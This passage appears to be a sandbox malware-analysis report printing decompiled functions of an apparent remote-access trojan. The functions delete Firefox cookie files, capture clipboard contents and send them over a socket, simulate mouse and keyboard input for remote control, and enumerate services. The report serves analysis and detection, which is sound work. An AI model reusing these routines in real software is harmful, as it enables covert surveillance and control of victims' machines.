										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											_t104 = E004076DF( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
											E00401FC3( &_v52, _t59, _t110, E004076BB(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
											E00401FB9();
											E00401FB9();
											__eflags = DeleteFileA(E00401F87( &_v52));
											if(__eflags != 0) {
												_t102 = _t111 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t110);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							__eflags = FindNextFileA(_t110,  &_v444);
						} while (__eflags != 0);
						goto L17;
					}
				} else {
					FindClose(_t110);
					_t102 = _t111 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E00402076(0, _t102);
					E0040A724(0, _t104, _t117);
					L18:
				}
				L19:
				E00401FB9();
				E00401FB9();
				return 1;
			}

























                                                                                                0x0040a262
                                                                                                0x0040a262
                                                                                                0x0040a270
                                                                                                0x0040a278
                                                                                                0x0040a285
                                                                                                0x0040a2a5
                                                                                                0x0040a2ad
                                                                                                0x0040a2b5
                                                                                                0x0040a2c6
                                                                                                0x0040a2e3
                                                                                                0x0040a2e5
                                                                                                0x0040a2ea
                                                                                                0x0040a2ed
                                                                                                0x0040a320
                                                                                                0x0040a322
                                                                                                0x0040a3ee
                                                                                                0x0040a3f8
                                                                                                0x0040a3fd
                                                                                                0x0040a406
                                                                                                0x00000000
                                                                                                0x0040a328
                                                                                                0x0040a328
                                                                                                0x0040a32a
                                                                                                0x0040a32a
                                                                                                0x0040a331
                                                                                                0x00000000
                                                                                                0x0040a337
                                                                                                0x0040a337
                                                                                                0x0040a33d
                                                                                                0x0040a340
                                                                                                0x0040a34e
                                                                                                0x0040a34e
                                                                                                0x0040a354
                                                                                                0x0040a356
                                                                                                0x0040a356
                                                                                                0x0040a35a
                                                                                                0x0040a35f
                                                                                                0x0040a362
                                                                                                0x0040a368
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a36a
                                                                                                0x0040a36b
                                                                                                0x0040a36e
                                                                                                0x00000000
                                                                                                0x0040a370
                                                                                                0x0040a370
                                                                                                0x0040a370
                                                                                                0x0040a379
                                                                                                0x0040a379
                                                                                                0x0040a37b
                                                                                                0x00000000
                                                                                                0x0040a37d
                                                                                                0x0040a395
                                                                                                0x0040a3a4
                                                                                                0x0040a3ac
                                                                                                0x0040a3b4
                                                                                                0x0040a3c8
                                                                                                0x0040a3ca
                                                                                                0x0040a432
                                                                                                0x0040a434
                                                                                                0x00000000
                                                                                                0x0040a3cc
                                                                                                0x0040a3cc
                                                                                                0x0040a3d3
                                                                                                0x0040a3d6
                                                                                                0x0040a427
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a3d6
                                                                                                0x0040a3ca
                                                                                                0x00000000
                                                                                                0x0040a37b
                                                                                                0x0040a374
                                                                                                0x0040a376
                                                                                                0x0040a376
                                                                                                0x00000000
                                                                                                0x0040a342
                                                                                                0x0040a346
                                                                                                0x0040a348
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040a348
                                                                                                0x0040a340
                                                                                                0x00000000
                                                                                                0x0040a3d8
                                                                                                0x0040a3e6
                                                                                                0x0040a3e6
                                                                                                0x00000000
                                                                                                0x0040a32a
                                                                                                0x0040a2ef
                                                                                                0x0040a2f0
                                                                                                0x0040a2f9
                                                                                                0x0040a2fb
                                                                                                0x0040a300
                                                                                                0x0040a300
                                                                                                0x0040a305
                                                                                                0x0040a40c
                                                                                                0x0040a40c
                                                                                                0x0040a40e
                                                                                                0x0040a411
                                                                                                0x0040a419
                                                                                                0x0040a425

                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2DA
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A2F0
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040A31A
                                                                                                • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A3C2
                                                                                                • GetLastError.KERNEL32 ref: 0040A3CC
                                                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3E0
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A406
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040A427
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 532992503-432212279
                                                                                                • Opcode ID: 494c37ec604dfabe53921b45c37f0438a968762c2238668dac5d0b9ef9ce98f6
                                                                                                • Instruction ID: d893d8744396c2104635ba5db21cca7574aa892270d2e78e55a4dc7850fafc56
                                                                                                • Opcode Fuzzy Hash: 494c37ec604dfabe53921b45c37f0438a968762c2238668dac5d0b9ef9ce98f6
                                                                                                • Instruction Fuzzy Hash: 65418F309003295ACB14F7A5DC56DEEB768AF11308F50417FF502B61D2EF789E89CA9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00413718, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 83clipboardmemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 89%
                                                                                                			E00413718(char* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				int _t10;
				void* _t20;
				void* _t22;
				void* _t31;
				struct HWND__* _t38;
				void* _t57;
				void* _t61;
				void* _t64;
				void* _t66;

				_t55 = __edx;
				_t10 = OpenClipboard(_t38);
				_t68 = _t10;
				if(_t10 != 0) {
					EmptyClipboard();
					E00401E3B( &_a16, _t55, _t68, _t38);
					_t57 = GlobalAlloc(0x2000, E0040247B() + 2);
					_t20 = GlobalLock(_t57);
					E00401E3B( &_a12, _t55, _t68, _t38);
					_t22 = E0040247B();
					E00433360(_t20, E00401F87(E00401E3B( &_a8, _t55, _t68, _t38)), _t22);
					_t66 = _t64 + 0xc;
					GlobalUnlock(_t57);
					SetClipboardData(0xd, _t57);
					CloseClipboard();
					if(OpenClipboard(_t38) != 0) {
						_t61 = GetClipboardData(0xd);
						_t31 = GlobalLock(_t61);
						GlobalUnlock(_t61);
						CloseClipboard();
						_t50 =  !=  ? _t31 : 0x46079c;
						E00404260(_t38,  &_a36,  !=  ? _t31 : 0x46079c);
						_t55 =  &_a32;
						E00417D8C(_t38, _t66 - 0x18,  &_a32);
						_push(0x6b);
						E00404BB7(_t38, 0x46e848,  &_a32, _t31);
						E00401EE2();
					}
				}
				E00401E66( &_a16, _t55);
				E00401FB9();
				E00401FB9();
				return 0;
			}













                                                                                                0x00413718
                                                                                                0x00413719
                                                                                                0x0041371f
                                                                                                0x00413721
                                                                                                0x00413727
                                                                                                0x00413732
                                                                                                0x0041374d
                                                                                                0x00413750
                                                                                                0x0041375d
                                                                                                0x00413764
                                                                                                0x0041377d
                                                                                                0x00413782
                                                                                                0x00413786
                                                                                                0x0041378f
                                                                                                0x004137ac
                                                                                                0x004137bb
                                                                                                0x004137c9
                                                                                                0x004137cc
                                                                                                0x004137d5
                                                                                                0x004137db
                                                                                                0x004137e8
                                                                                                0x004137f0
                                                                                                0x004137f8
                                                                                                0x004137fe
                                                                                                0x00413803
                                                                                                0x0041380a
                                                                                                0x00413bb7
                                                                                                0x00413bb7
                                                                                                0x004137bb
                                                                                                0x00413df2
                                                                                                0x00413dfe
                                                                                                0x00413e0a
                                                                                                0x00413e17

                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00413719
                                                                                                • EmptyClipboard.USER32 ref: 00413727
                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00413747
                                                                                                • GlobalLock.KERNEL32 ref: 00413750
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00413786
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0041378F
                                                                                                • CloseClipboard.USER32 ref: 004137AC
                                                                                                • OpenClipboard.USER32 ref: 004137B3
                                                                                                • GetClipboardData.USER32 ref: 004137C3
                                                                                                • GlobalLock.KERNEL32 ref: 004137CC
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004137D5
                                                                                                • CloseClipboard.USER32 ref: 004137DB
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                • String ID: HF
                                                                                                • API String ID: 3520204547-543897734
                                                                                                • Opcode ID: 4890fb612279e0ad9894535ee24836a5794b070536a2b296e3cf0257e589ee37
                                                                                                • Instruction ID: baa6a5d0df61b6bfd4a8d42e09ca4ec442865c3948b396e9068abef2692e7357
                                                                                                • Opcode Fuzzy Hash: 4890fb612279e0ad9894535ee24836a5794b070536a2b296e3cf0257e589ee37
                                                                                                • Instruction Fuzzy Hash: BB21397120420057D314BFB1DC5E9BE76A99FD470AF04053EF907961E2DF38C985865A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00415968, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E00415968(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E004052CF(0)));
				E00404287( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E004052CF(0)));
									_t60 = E004052CF(4);
									_t101 =  *0x46de68; // 0x0
									_v40 =  *_t60;
									E00415802( *((intOrPtr*)(0x46dd68 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									E00415C34(_v44, _v40);
								}
							} else {
								_t65 = E004052CF(0);
								_v44 =  *((intOrPtr*)(E004052CF(4)));
								_t67 = E004052CF(8);
								_t109 =  *0x46de68; // 0x0
								_v44 =  *_t67;
								E00415802( *((intOrPtr*)(0x46dd68 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								E00415BD8( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E004052CF(0);
							_v40 =  *((intOrPtr*)(E004052CF(4)));
							_t74 = E004052CF(8);
							_t118 =  *0x46de68; // 0x0
							_v48 =  *_t74;
							E00415802( *((intOrPtr*)(0x46dd68 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							E00415B7C( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E004052CF(4);
						_t80 = E004052CF(3);
						_t81 = E004052CF(2);
						_t82 = E004052CF(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						E00415C6C( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E004052CF(0);
					_t85 = E004052CF(1);
					E00414F9A( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E004052CF(2)));
					L8:
				}
				E00401FB9();
				return E00401FB9();
			}
























                                                                                                0x00415968
                                                                                                0x00415986
                                                                                                0x0041598d
                                                                                                0x00415995
                                                                                                0x004159d4
                                                                                                0x004159d7
                                                                                                0x00415a33
                                                                                                0x00415a36
                                                                                                0x00415a93
                                                                                                0x00415a96
                                                                                                0x00415af4
                                                                                                0x00415af7
                                                                                                0x00415b45
                                                                                                0x00415b48
                                                                                                0x00415b4f
                                                                                                0x00415b52
                                                                                                0x00415b54
                                                                                                0x00415b55
                                                                                                0x00000000
                                                                                                0x00415b55
                                                                                                0x00415b4a
                                                                                                0x00415b4a
                                                                                                0x00415b4b
                                                                                                0x00415b57
                                                                                                0x00415b5e
                                                                                                0x00415b5e
                                                                                                0x00415af9
                                                                                                0x00415b0b
                                                                                                0x00415b0f
                                                                                                0x00415b14
                                                                                                0x00415b27
                                                                                                0x00415b30
                                                                                                0x00415b3e
                                                                                                0x00415b3e
                                                                                                0x00415a98
                                                                                                0x00415a9d
                                                                                                0x00415ab3
                                                                                                0x00415abb
                                                                                                0x00415ac0
                                                                                                0x00415ad3
                                                                                                0x00415adc
                                                                                                0x00415aec
                                                                                                0x00000000
                                                                                                0x00415aec
                                                                                                0x00415a38
                                                                                                0x00415a3d
                                                                                                0x00415a53
                                                                                                0x00415a5b
                                                                                                0x00415a60
                                                                                                0x00415a73
                                                                                                0x00415a7c
                                                                                                0x00415a8c
                                                                                                0x00000000
                                                                                                0x00415a8c
                                                                                                0x004159d9
                                                                                                0x004159df
                                                                                                0x004159ec
                                                                                                0x004159f9
                                                                                                0x00415a06
                                                                                                0x00415a11
                                                                                                0x00415a1b
                                                                                                0x00415a28
                                                                                                0x00000000
                                                                                                0x00415a2d
                                                                                                0x00415997
                                                                                                0x0041599c
                                                                                                0x004159a9
                                                                                                0x004159ca
                                                                                                0x00415af1
                                                                                                0x00415af1
                                                                                                0x00415b68
                                                                                                0x00415b7b

                                                                                                APIs
                                                                                                • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 004159BC
                                                                                                • mouse_event.USER32 ref: 00415B5E
                                                                                                  • Part of subcall function 00415802: GetSystemMetrics.USER32 ref: 00415837
                                                                                                  • Part of subcall function 00415802: GetSystemMetrics.USER32 ref: 0041584C
                                                                                                  • Part of subcall function 00415C34: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 00415C60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MetricsSystem$InputSendmouse_event
                                                                                                • String ID: 0$1$2$3$4$5$6
                                                                                                • API String ID: 1731092567-2737206560
                                                                                                • Opcode ID: 4e58b7ee089f2b41bba26569178f90f2d490adecfb0853686d80bfb814d9debd
                                                                                                • Instruction ID: 0830a3fa4487c9ddd4d3a0e861aa4b46f3ad6227d130d9b0a4fa38bfcfba80c1
                                                                                                • Opcode Fuzzy Hash: 4e58b7ee089f2b41bba26569178f90f2d490adecfb0853686d80bfb814d9debd
                                                                                                • Instruction Fuzzy Hash: 2251E174A187019FC700EF20D891ADB77A5EFD5714F00082FF592572E2DB78AA48CB5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00416A9F, Relevance: 15.2, APIs: 10, Instructions: 226serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00416A9F(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t124;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;
				struct _QUERY_SERVICE_CONFIG* _t204;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					E00401F5F(_t133,  &_v88);
					_v12 = 0;
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E0040330C(_t133, _t198, __eflags,  &_v88);
						E00401EE2();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
					_push(_t201);
					_t87 = E0043776E( &_v88);
					_v36 = _t87;
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L00437769(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E00403303(E004043E6(_t133,  &_v112, _t199[1], __eflags, E00404260(_t133,  &_v64, 0x466afc)));
						E00401EE2();
						E00401EE2();
						E00403303(E004043E6(_t133,  &_v64,  *_t199, __eflags, E00404260(_t133,  &_v112, 0x466afc)));
						E00401EE2();
						E00401EE2();
						_t100 = E00404260(_t133,  &_v136, 0x466afc);
						E00403303(E00403022( &_v64, E00417C8F(_t133,  &_v112, _t199[3]), _t100));
						E00401EE2();
						E00401EE2();
						E00401EE2();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = E0043776E( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _t204, _t203,  &_v16);
								E00403303(E00403098(_t133,  &_v136, E00417C8F(_t133,  &_v64,  *_t204), _t199, __eflags, 0x466afc));
								E00401EE2();
								E00401EE2();
								_t52 = _t204 + 4; // 0x17e1e8d0
								E00403303(E00403098(_t133,  &_v136, E00417C8F(_t133,  &_v64,  *_t52), _t199, __eflags, 0x466afc));
								E00401EE2();
								E00401EE2();
								_t124 = E00404260(_t133,  &_v112, 0x466afc);
								_t59 = _t204 + 0xc; // 0x8558d18
								E00403303(E00403098(_t133,  &_v136, E004043E6(_t133,  &_v64,  *_t59, __eflags, _t124), _t199, __eflags, "\n"));
								E00401EE2();
								E00401EE2();
								E00401EE2();
								L00437769(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						__eflags = _t202 - _v8;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E00404260(_t133, _t198, 0x46079c);
				goto L13;
			}
































                                                                                                0x00416aaf
                                                                                                0x00416ab3
                                                                                                0x00416abc
                                                                                                0x00416ac0
                                                                                                0x00416ad6
                                                                                                0x00416ade
                                                                                                0x00416ae5
                                                                                                0x00416aec
                                                                                                0x00416b03
                                                                                                0x00416b05
                                                                                                0x00416d4e
                                                                                                0x00416d4f
                                                                                                0x00416d5b
                                                                                                0x00416d63
                                                                                                0x00416d68
                                                                                                0x00416d70
                                                                                                0x00416d70
                                                                                                0x00416b11
                                                                                                0x00416b16
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00416b1c
                                                                                                0x00416b1f
                                                                                                0x00416b20
                                                                                                0x00416b29
                                                                                                0x00416b3c
                                                                                                0x00416b42
                                                                                                0x00416b44
                                                                                                0x00416b47
                                                                                                0x00416b4a
                                                                                                0x00416d45
                                                                                                0x00416d48
                                                                                                0x00000000
                                                                                                0x00416d4d
                                                                                                0x00416b50
                                                                                                0x00416b53
                                                                                                0x00416b71
                                                                                                0x00416b79
                                                                                                0x00416b81
                                                                                                0x00416ba3
                                                                                                0x00416bab
                                                                                                0x00416bb3
                                                                                                0x00416bc3
                                                                                                0x00416be3
                                                                                                0x00416beb
                                                                                                0x00416bf3
                                                                                                0x00416bfe
                                                                                                0x00416c03
                                                                                                0x00416c0c
                                                                                                0x00416c15
                                                                                                0x00416c1f
                                                                                                0x00416c25
                                                                                                0x00416c27
                                                                                                0x00416c2d
                                                                                                0x00416c33
                                                                                                0x00416c36
                                                                                                0x00416c3c
                                                                                                0x00416c3f
                                                                                                0x00416c46
                                                                                                0x00416c4e
                                                                                                0x00416c55
                                                                                                0x00416c7c
                                                                                                0x00416c87
                                                                                                0x00416c8f
                                                                                                0x00416c94
                                                                                                0x00416cb6
                                                                                                0x00416cc1
                                                                                                0x00416cc9
                                                                                                0x00416cdb
                                                                                                0x00416ce0
                                                                                                0x00416cff
                                                                                                0x00416d0a
                                                                                                0x00416d12
                                                                                                0x00416d1a
                                                                                                0x00416d20
                                                                                                0x00416d25
                                                                                                0x00416d28
                                                                                                0x00416c36
                                                                                                0x00416d2c
                                                                                                0x00416d32
                                                                                                0x00416d33
                                                                                                0x00416d36
                                                                                                0x00416d39
                                                                                                0x00416d39
                                                                                                0x00416d42
                                                                                                0x00000000
                                                                                                0x00416d42
                                                                                                0x00416ac9
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,0046EAC8), ref: 00416AB6
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00416AFD
                                                                                                • GetLastError.KERNEL32 ref: 00416B0B
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 00416B3C
                                                                                                • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,00466AFC,00000000,00466AFC,00000000,00466AFC), ref: 00416C0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                                                                                • String ID:
                                                                                                • API String ID: 2247270020-0
                                                                                                • Opcode ID: 652c6fad2e8d9efb67d0626e4b103414f7596d9ecb0e6dd7e91ce2b9e1164298
                                                                                                • Instruction ID: ab14fdf8f88a486ee839615bc9b265fb102329eecdc65eab08f32e9fae7241cf
                                                                                                • Opcode Fuzzy Hash: 652c6fad2e8d9efb67d0626e4b103414f7596d9ecb0e6dd7e91ce2b9e1164298
                                                                                                • Instruction Fuzzy Hash: 58812D71D00109ABCB14EBA1EC969EEB778EF54305F20806EF602761D1EF786A45CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00415DC8, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 245fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 90%
                                                                                                			E00415DC8(char* __edx, void* __eflags, char _a8) {
				struct _WIN32_FIND_DATAW _v1028;
				char _v1036;
				char _v1064;
				char _v1088;
				void* _v1092;
				char _v1100;
				char _v1116;
				void* _v1120;
				char _v1128;
				char _v1136;
				char _v1152;
				char _v1156;
				char _v1160;
				void* _v1164;
				char _v1172;
				char _v1176;
				void* _v1188;
				char _v1196;
				void* _v1200;
				void* _v1204;
				char _v1208;
				char _v1220;
				char _v1224;
				char _v1228;
				char _v1232;
				char _v1236;
				char _v1240;
				char _v1252;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t63;
				int _t85;
				int _t91;
				void* _t102;
				void* _t108;
				void* _t109;
				char* _t113;
				void* _t115;
				void* _t116;
				void* _t130;
				void* _t133;
				void* _t228;
				void* _t229;
				signed int _t234;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;

				_t242 = __eflags;
				_t213 = __edx;
				_push(_t139);
				_t63 = E00401F87( &_a8);
				E00404287( &_a8,  &_v1100, 4, 0xffffffff);
				_t237 = (_t234 & 0xfffffff8) - 0x4b4;
				E004020DE(_t139, _t237, __edx, _t242, 0x46e250);
				_t238 = _t237 - 0x18;
				E004020DE(_t139, _t238, __edx, _t242,  &_v1116);
				E00417E68( &_v1252, _t213);
				_t239 = _t238 + 0x30;
				_t228 =  *_t63 - 0x19;
				if(_t228 == 0) {
					E004020C7(_t139,  &_v1220);
					_t213 = 0x46e978;
					E00407677( &_v1172, 0x46e978, __eflags, L"\\*");
					_t229 = FindFirstFileW(E00401EDD( &_v1172),  &_v1028);
					__eflags = _t229 - 0xffffffff;
					if(__eflags == 0) {
						L14:
						E004020DE(_t139, _t239 - 0x18, _t213, __eflags,  &_v1220);
						_push(0x5d);
						E00404BB7(_t139, 0x46ea30, _t213, __eflags);
						E00401EE2();
						E00401FB9();
						goto L15;
					}
					E00404260(_t139,  &_v1196,  &(_v1028.cFileName));
					_t213 = ".";
					_t85 = E00407647(__eflags);
					_t139 = _t85;
					E00401EE2();
					__eflags = _t85;
					if(__eflags != 0) {
						E00401FC3( &_v1228, ".", _t229, E0040209D(_t139,  &_v1196, ".", __eflags,  &_v1028, 0x250));
						E00401FB9();
					}
					while(1) {
						__eflags = FindNextFileW(_t229,  &_v1028);
						if(__eflags == 0) {
							goto L14;
						}
						E00404260(_t139,  &_v1196,  &(_v1028.cFileName));
						_t213 = L"..";
						_t91 = E00407647(__eflags);
						_t139 = _t91;
						E00401EE2();
						__eflags = _t91;
						if(__eflags != 0) {
							E00403428(E0040209D(_t139,  &_v1196, L"..", __eflags,  &_v1028, 0x250));
							E00401FB9();
						}
					}
					goto L14;
				} else {
					_t244 = _t228 == 1;
					if(_t228 == 1) {
						_t102 = E00417CCA( &_v1152, E00401E3B( &_v1232, _t213, _t244, 1));
						E00403022( &_v1176, E00407677( &_v1128, 0x46e978, _t244, "\\"), _t102);
						E00401EE2();
						E00401EE2();
						E004020C7(_t139,  &_v1224);
						_t108 = E00401EDD( &_v1176);
						_t213 =  &_v1224;
						_t109 = E004183CC(_t108,  &_v1224);
						_t245 = _t109;
						if(_t109 != 0) {
							_t113 = E00401F87(E00401E3B(0x46e3a4,  &_v1224, _t245, 0x1b));
							_t246 =  *_t113 - 1;
							if( *_t113 == 1) {
								_t130 = E0040247B();
								E00405C28( &_v1028, E00401F87(0x46e5f0), _t130);
								_t133 = E0040247B();
								E00401FC3( &_v1240, _t213, 0x46e5f0, E00405D50(_t139,  &_v1036, _t213,  &_v1156, E00401F87( &_v1228), _t133));
								E00401FB9();
							}
							_t115 = E00401E3B( &_v1232, _t213, _t246, 2);
							_t116 = E00401E3B( &_v1236, _t213, _t246, 0);
